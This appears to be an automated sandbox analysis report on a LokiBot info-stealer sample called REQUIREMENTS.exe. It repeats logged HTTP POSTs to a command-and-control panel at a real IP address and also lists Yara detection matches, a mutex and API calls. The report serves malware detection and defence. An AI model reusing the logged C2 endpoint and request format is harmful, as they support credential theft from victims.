                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: unknownTCP traffic detected without corresponding DNS query: 45.134.225.18
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_00404ED4 recv,
                Source: unknownHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Dec 2020 08:57:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.6.40Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: REQUIREMENTS.exe, 00000001.00000002.504632092.000000000049F000.00000040.00000001.sdmpString found in binary or memory: http://45.134.225.18/plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php
                Source: REQUIREMENTS.exe, 00000000.00000002.247777957.0000000003A99000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.
                Source: REQUIREMENTS.exe, REQUIREMENTS.exe, 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.247777957.0000000003A99000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.REQUIREMENTS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.REQUIREMENTS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.REQUIREMENTS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.REQUIREMENTS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                .NET source code contains very large stringsShow sources
                Source: REQUIREMENTS.exe, MainModule.csLong String: Length: 81136
                Source: 0.2.REQUIREMENTS.exe.730000.0.unpack, MainModule.csLong String: Length: 81136
                Source: 0.0.REQUIREMENTS.exe.730000.0.unpack, MainModule.csLong String: Length: 81136
                Source: 1.0.REQUIREMENTS.exe.d90000.0.unpack, MainModule.csLong String: Length: 81136
                Source: 1.2.REQUIREMENTS.exe.d90000.1.unpack, MainModule.csLong String: Length: 81136
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_00735B6A
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_0073EF45
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_0291A458
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_0291A908
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_02919A18
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_02917F70
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_04AD7329
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_04ADBC0B
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_04AD9C00
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_04AD99A0
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_04AD99B0
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_04AD5BE8
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_04AD5BD7
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_00739761
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_007409E2
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_0040549C
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_004029D4
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_00D9EF45
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_00D95B6A
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_00DA09E2
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_00D99761
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: String function: 00405B6F appears 42 times
                Source: REQUIREMENTS.exe, 00000000.00000002.247777957.0000000003A99000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameGlaxoSmithKline.dll@ vs REQUIREMENTS.exe
                Source: REQUIREMENTS.exe, 00000000.00000002.247031683.00000000007B6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIEnumerable.exe@ vs REQUIREMENTS.exe
                Source: REQUIREMENTS.exe, 00000000.00000002.254478009.0000000026880000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNT1.dll, vs REQUIREMENTS.exe
                Source: REQUIREMENTS.exe, 00000001.00000000.245948213.0000000000E16000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIEnumerable.exe@ vs REQUIREMENTS.exe
                Source: REQUIREMENTS.exeBinary or memory string: OriginalFilenameIEnumerable.exe@ vs REQUIREMENTS.exe
                Source: 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.247777957.0000000003A99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.REQUIREMENTS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.REQUIREMENTS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.REQUIREMENTS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.REQUIREMENTS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@0/1
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\REQUIREMENTS.exe.logJump to behavior
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: REQUIREMENTS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
